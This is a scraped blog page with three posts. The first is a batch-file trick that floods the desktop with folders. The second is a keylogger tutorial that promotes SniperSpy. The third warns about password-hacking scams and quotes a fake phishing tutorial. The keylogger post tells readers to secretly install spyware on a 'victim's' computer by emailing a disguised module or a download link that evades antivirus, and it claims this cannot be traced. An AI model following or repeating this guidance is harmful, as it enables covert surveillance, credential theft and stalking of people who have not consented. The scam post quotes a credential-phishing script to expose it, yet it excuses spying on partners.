1.Open notepad
2. Type
@echo off
:top
md %random%
got top

3.Save as all files .bat











 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
4. You done and when you open it  1000files in the desktop will appeared
 
 
 
 

Saturday, 2 March 2013

How to Use Keyloggers: A Detailed Tutorial with FAQs


How to Use Keyloggers 
Here is a detailed tutorial which contains every possible information that you need to know about keyloggers.
I know most of you are new to the concept of keyloggers. For some of you, this might be the first time you heard about the term “keylogger”. So, to give you a clear picture and make you understand better, I would like to take up this post in the form of FAQs (Frequently Asked Questions). Here we go…
NOTE: I highly recommend that you read this post completely since every single piece of information is important.

1. What is a Keylogger?

A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed in just a few seconds and once installed, you are only a step away from getting the target password and other sensitive data.

2. How Keylogger works?

Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the target computer.
Let’s take up a small example: The user on the target computer goes to http://mail.yahoo.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password“. Along with this, you will also be shown that they were typed in the Yahoo login page. Thus, the keylogger loads upon every startup, runs in the background and captures each and every keystroke.

3. How to install the keylogger?

A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.

4. Do I need any special knowledge to install and use the keylogger?

Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.

5. Once I install the keylogger can the victim come to know about it’s presence?

No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed, the keylogger will run in total stealth mode. Unlike other programs, it will never show up in the start-menu, windows startup, program files, add/remove programs or the task manager. So, the victim can no way identify it’s presence on his/her PC.

6. Can I be traced back if I install the keylogger on some other computer?

No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.

7. Which keylogger is the best?

Today, there exists hundreds of keyloggers on the market and most of them are no more than a scam. So, I have personally tested some of the top keyloggers and conclude SniperSpy as the best one:

8. How SniperSpy works?

I will try to explain the working of Sniperspy in simple steps:
  1. After you purchase Sniperspy, you’ll be able to create the installation module using an easy set-up program. You need to email this module to the remote user as an attachment.
  2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continuously.
  3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.

9. I don’t have physical access to the target computer. Can I still use SniperSpy?

Yes you can! SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation, all you need to do is just place the module (refer FAQ-8) in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).

10. Can I install SniperSpy on a local computer?

If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module ( Refer FAQ-8). Double-click the module filename to execute it. Nothing will appear on the screen but the software gets installed silently.

11. What if the antivirus prevent from sending it as an email attachment?

Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.fileden.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.

12. Why SniperSpy is the best?

  • SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.
  • SniperSpy is fully compatible with Windows 2000/XP/Vista/7/8 and also Mac.
  • SniperSpy can bypass any Firewall.
  • SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead, you can just log in to your online SniperSpy account to receive the logs.
  • SniperSpy captures full-size screenshots of the activities on the target PC.
  • Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.
  • SniperSpy is more easy to install and requires no extra knowledge.
  • SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence, it is reputed and trustworthy.

13. How safe is to use SniperSpy?

Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy do not collect any information from your system other than the information required for the product’s successful operation. They will not contact you in any way unless you request assistance.

14. Is my online order Safe and Secure?

Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So, you can place your order for SniperSpy with no worries of scam!
SniperSpy is completely reliable, safe and the best keylogger out there. It is really worth the price that you pay for it. I promise that you cannot get a better keylogger than this. So, what are you waiting for? Go grab SniperSpy now and expose the truth!

Beware of Password Hacking Scams and Fake Tutorials


Beware of Online Scams 
In the era of Internet, emails and social networking have taken a prominent role in almost everyone’s life, especially when it comes to the exchange of information and personal messages. So, hacking the password of an email or social networking account alone can reveal a lot of personal details about the person. Even though hacking is considered illegal, some people are left with no other option. This can be a parent wanting to gain access to the child’s email or someone who need the password of their partner’s social media account.

Well, this post is not about teaching you how to hack! But, it is about making you aware of some of the password hacking scams and fake hacking tutorials that are waiting to exploit those people who are in desperate need of hacking someone’s online password. Here is a list of some of the online scams that you should be aware of and always stay away from:

1. Password Hacking Services:

Many of the scam websites have managed to rank on top of Google for some of the most popular keywords about hacking. As a result, these websites attract a lot of people (who are in need of someone’s password) and promise them to give what they want! As most people do not have any knowledge about hacking, they often believe what is mentioned on these websites is true. Taking this factor as an added advantage, these websites (the so called hacking services) rip off money from the people and never keep up their promise.

Why password hacking services do not work?

The big reason behind why these services never work is that, most of them are owned by those scammers and noob hackers who do not have sound knowledge of how the hacking process actually works. Also, with the level of security adopted by the services like Gmail, Yahoo or Facebook, it is near impossible to to hack their database to obtain the password. Unlike, what is mentioned on most of these websites, it is not possible to use the brute force approach as well. Here is a list of some of the false claims made by most hacking services (in their own words):
  • We are a group of elite hackers working behind this site capable of cracking any password.
  • We have found out a certain vulnerability in the Facebook or Gmail servers using which we crack the password.
  • We use brute force approach to crack the password.
  • After a long time of research and hard work, we have managed to develop a program that can crack any password with just a click of a button.
If you come across a site making claims as mentioned above, it is a clear sign of a scam service. To identify them more clearly, here is a list of additional signs that you can look for:
  • Even though some websites claim that their service is free, they demand users to take up an online survey in order to avail the service. In reality, these websites are created to earn money by forcing people to participate in a survey program.
  • These websites accept payment only through services like Western Union and Money Gram but not via credit card. This is a clear sign of fraud as the money sent through these services cannot be tracked and refund cannot be claimed later.
So, the bottom line is that, if you come across a website that seems too good to be true or show some signs as mentioned above, it is always a better choice to stay away from them.

2. Fake Hacking Tutorials:

This is another type of scam that most teenagers fall victim for. This is because, most teenagers do not have enough money to afford the hacking services and hence go in search of free options and hacking tutorials that can easily get them the password they want. This is where the fake hacking tutorials come into play.
This tutorial is designed cleverly to trick users and make them believe it is true. But, in reality, when someone follows the method prescribed in the tutorial, they lose their own password in attempt to hack someone else’s password. Here is a small example of how this fake tutorial goes:

Here is an easy way to hack any Gmail password. This method was revealed by a professional hacker to me which when tried was successful.
  1. Log in to your Gmail account and compose a new email.
  2. In the subject, type exactly as follows: “password retrieval”.
  3. In the body of the email, type your username followed by your password in the first line.
  4. Leave exactly 3 lines of gap and type in the target username that you want to hack. Then send this email to: passretrieve2013@gmail.com.
When you do this, the Gmail server gets confused and will send the target password to your inbox within the next few hours.

Now, let us carefully look at how the above trick works. This trick is designed intelligently by a noob hacker and is often posted on many forums and low quality websites. Here, the creator of this tutorial tells a lie to the people that there exists a bug in the Gmail system that can be exploited by using the tutorial. However, by following this trick, innocent victims are sending their own password to the hacker’s email address (passretrieve2013@gmail.com) and thus get trapped.
This is another type of scam that seems too good to be true. Unfortunately, most people would follow this trick and end up handing over their login details to an unknown person. If you’ve ever tried this method, it is a wise option to change your password immediately in order to prevent any further damage.
I hope you like this post. Please pass your comments. :)